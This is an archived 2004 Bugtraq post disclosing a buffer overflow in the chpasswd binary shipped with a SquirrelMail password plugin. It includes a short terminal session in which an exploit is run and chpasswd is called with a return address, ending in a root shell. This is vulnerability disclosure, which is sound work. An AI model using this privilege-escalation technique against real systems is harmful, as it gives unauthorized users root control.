lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 17 Apr 2004 04:20:26 -0300
From: Matias Neiff <matias@...ff.com.ar>
To: bugtraq@...urityfocus.com
Subject: Squirrelmail Chpasswod bof


Hi all

There is a boffer over flow in the chpasswd binary, distributed with the 
plugin. This allow to local's user to execute commands as a root.
---:::Prott:::---
root@...o:/mnt/hosting/hack/bof# su webmaster
webmaster@...o:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=0(root) gid=3(sys) groups=500(webmaster)
sh-2.05b#
---:::end:::---

Bye all



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ